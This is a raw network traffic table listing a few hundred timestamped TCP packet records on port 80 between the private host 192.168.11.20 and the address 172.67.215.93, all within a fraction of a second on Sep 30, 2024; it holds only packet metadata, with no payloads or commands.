Sep 30, 2024 15:10:14.713887930 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.713911057 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.713934898 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.713934898 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.714103937 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.714133024 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.714175940 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.714276075 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.714276075 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.714276075 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.714348078 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.714399099 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.714457989 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.714493990 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.714632034 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.714654922 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.714663982 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.714664936 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.714833975 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.714972973 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.714997053 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.715054035 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.715110064 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.715132952 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.715153933 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.715173006 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.715187073 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.715344906 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.715344906 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.715830088 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.715936899 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.715982914 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.716025114 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.716074944 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.716123104 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.716145992 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.716167927 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.716243982 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.716243982 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.716413021 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.716752052 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.716798067 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.716821909 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.716844082 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.716886044 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.716932058 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.716939926 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.716965914 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.716989040 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.717112064 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.717112064 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.717281103 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.717677116 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.717724085 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.717746973 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.717778921 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.717849016 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.717866898 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.717866898 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.717888117 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.717912912 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.717935085 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.718036890 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.718205929 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.718574047 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.718764067 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.718905926 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.718935013 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.718956947 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.718980074 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.719002962 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.719095945 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.719095945 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.719141960 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.719309092 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.719314098 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.719446898 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.719470024 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.719484091 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.719511986 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.719572067 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.719624043 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.719646931 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.719670057 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.719752073 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.719752073 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.719921112 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.720320940 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.720366955 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.720419884 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.720473051 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.720496893 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.720537901 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.720669031 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.720716953 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.720778942 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.720778942 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.720947981 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.721117973 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.721349001 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.721467018 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.721522093 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.721548080 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.721569061 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.721590996 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.721612930 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.721633911 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.721713066 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.721713066 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.721713066 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.721880913 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.722237110 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.722274065 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.722345114 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.722390890 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.722419977 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.722448111 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.722469091 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.722491980 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.722513914 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.722660065 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.722660065 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.722829103 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.723514080 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.723565102 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.723589897 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.723612070 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.723634958 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.723656893 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.723678112 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.723699093 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.723803043 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.723973989 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.724263906 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.724298954 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.724359989 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.724384069 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.724405050 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.724426031 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.724447966 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.724468946 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.724483013 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.724653959 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.724653959 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.725339890 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.725377083 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.725456953 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.725513935 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.725528002 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.725549936 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.725574970 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.725579023 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.725615978 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.725637913 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.725748062 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.725918055 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.725918055 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.726172924 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.726289034 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.726339102 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.726362944 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.726412058 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.726466894 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.726488113 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.726509094 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.726528883 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.726528883 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.726697922 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.726697922 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.726866961 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.727195978 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.727240086 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.727332115 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.727453947 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.727500916 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.727526903 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.727530003 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.727530003 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.727694988 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.727694988 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.727744102 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.727787971 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.727809906 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.727833033 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.727864981 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.728034019 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.728204966 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.728269100 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.728389978 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.728435040 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.728457928 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.728480101 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.728502989 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.728524923 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.728545904 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.728545904 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.728763103 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.728905916 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.729145050 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.729305029 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.729466915 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.729490995 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.729494095 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.729522943 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.729716063 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.729718924 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.729748964 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.729770899 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.729794025 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.729882956 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.730052948 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.730273962 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.730402946 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.730452061 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.730463028 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.730487108 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.730509996 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.730572939 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.730596066 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.730618954 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.730632067 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.730803013 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.730803013 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.731282949 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.731332064 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.731353998 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.731381893 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.731441975 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.731465101 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.731471062 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.731497049 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.731518030 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.731642962 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.731642962 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.731812954 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.732146025 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.732302904 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.732327938 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.732336998 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.732391119 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.732438087 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.732460022 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.732482910 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.732506990 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.732676029 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.732676029 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.732676983 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.732845068 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.733227015 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.733273029 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.733300924 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.733377934 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.733484983 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.733508110 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.733514071 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.733514071 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.733545065 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.733566046 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.733685017 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.733685017 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.733853102 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.734142065 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.734184980 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.734327078 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.734364033 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.734390974 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.734414101 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.734436035 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.734457016 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.734477997 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.734533072 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.734704018 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.734704018 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.735215902 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.735363007 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.735404968 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.735472918 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.735495090 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.735574961 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.735625982 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.735646009 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.735666990 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.735726118 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.735745907 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.735745907 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.735914946 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.735914946 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.736084938 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.736290932 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.736368895 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.736473083 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.736531019 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.736534119 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.736560106 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.736614943 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.736635923 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.736700058 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.736747026 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.736795902 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.736809969 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.736876011 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.736896992 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.736967087 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.736967087 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.737137079 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.737256050 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.737479925 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.737484932 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.737524986 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.737548113 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.737569094 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.737587929 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.737607956 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.737627983 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.737698078 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.737916946 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.738380909 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.738404989 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.738426924 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.738449097 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.738470078 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.738528967 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.738540888 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.738703012 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.738711119 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.738758087 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.738882065 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.738882065 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.739051104 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.741343021 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.741497993 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.741523027 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.741542101 CEST	80	49754	172.67.215.93	192.168.11.20
